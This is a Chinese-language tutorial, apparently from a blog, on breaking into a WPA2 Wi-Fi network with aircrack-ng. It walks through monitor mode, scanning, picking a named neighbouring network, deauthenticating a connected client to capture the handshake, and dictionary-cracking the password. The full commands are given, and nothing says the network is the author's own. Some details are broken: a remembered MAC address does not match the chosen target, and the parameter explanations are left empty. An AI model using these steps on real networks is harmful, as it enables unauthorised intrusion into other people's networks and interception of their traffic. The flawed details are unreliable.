契
如今,人们的生活几乎离不开网络,方方面面得接入在互联网中,所以网络安全尤其重用,一不小心个人隐私就会暴露在大厅广众。
而在普通人的生活中,无线路由器是使用最广的设备,可以这们说,不管是公共场所、公司环境、个人家居,无线路由器都起到了至关重要的作用。而它同时也让你与外部网络形成隔离。
能在这个平台混的,几乎都知道抓包,所以,假如有人入侵到你的内网,然后在你的网关进行抓取,那后果。。。。。
思路分析
wifi信号看不见摸不着,所以要理解信号传输就有些困难。
(下面这张图能方便理解)
这个图有些抽象,大概的意思是,router向外发射信号,信号以自身为圆心,波状扩散,然后设备端接受到信号,知道router的存在,这时候如果你要链接router,就需要自身也发射信号,你的信号也会以波状发出,直到router接收到,在这个过程中,你们双方的信号都会携带自己的信息,一般是 MAC地址。
从这个过程,我们可以知道,这些信息是暴露在外的,事实上我们可以用一个接收器就能获得这些信号。只不过这些信号是加密的所以如果能解密,那么别人的通讯对你也就。。。。
准备
既然要接收信号,那你首先需要一个接收器,笔记本的无线网卡一般都带有监听,而台式机或者虚拟机推荐 Ralink RT3070L。
然后下载好主角 aircrack-ng 套件
# sudo apt install -y aircrack-ng
启动网卡监听
查看网卡是否支持监听
sudo airmon-ng
这时候得到网卡 wlp3s0,这就是我们要使用的网卡
启动网卡监听
sudo airmon-ng start wlp3s0
得到监听网卡 wlp3s0mon
扫描周围路由器
首先我们扫描一下周围有哪些无线路由器
sudo airodump-ng wlp3s0mon
这么多的wifi,我们选择
D4:83:04:BA:BF:10 -51 32 1 0 1 405 WPA2 CCMP PSK ^o^馨宝^o^
记住wifi 的mac地址
70:3A:D8:4A:6B:68
抓取握手包
因为wap2的算法不可逆转,所以只能抓取它的密码验证包,然后暴力破解匹配。
所以需要先断开他相连的一个用户,然后获取这个验证包。
查看链接用户
sudo airodump-ng -c 1 --bssid D4:83:04:BA:BF:10 -w ~/ wlp3s0mon
参数解析:
-c 表示:
–bssid 表示:
-w 表示:
断开用户抓包
sudo aireplay-ng -0 2 -a D4:83:04:BA:BF:10 -c 9C:E3:3F:76:35:1D wlp3s0mon
解密
获得我们需要的数据包后,我们关闭网卡的监听模式
sudo airmon-ng stop wlp3s0mon
现在开始跑包吧
sudo aircrack-ng -a2 -b D4:83:04:BA:BF:10 -w ~/mima.txt ./-01.cap
注意:这里使用的mima.txt是我自己用的密码字典。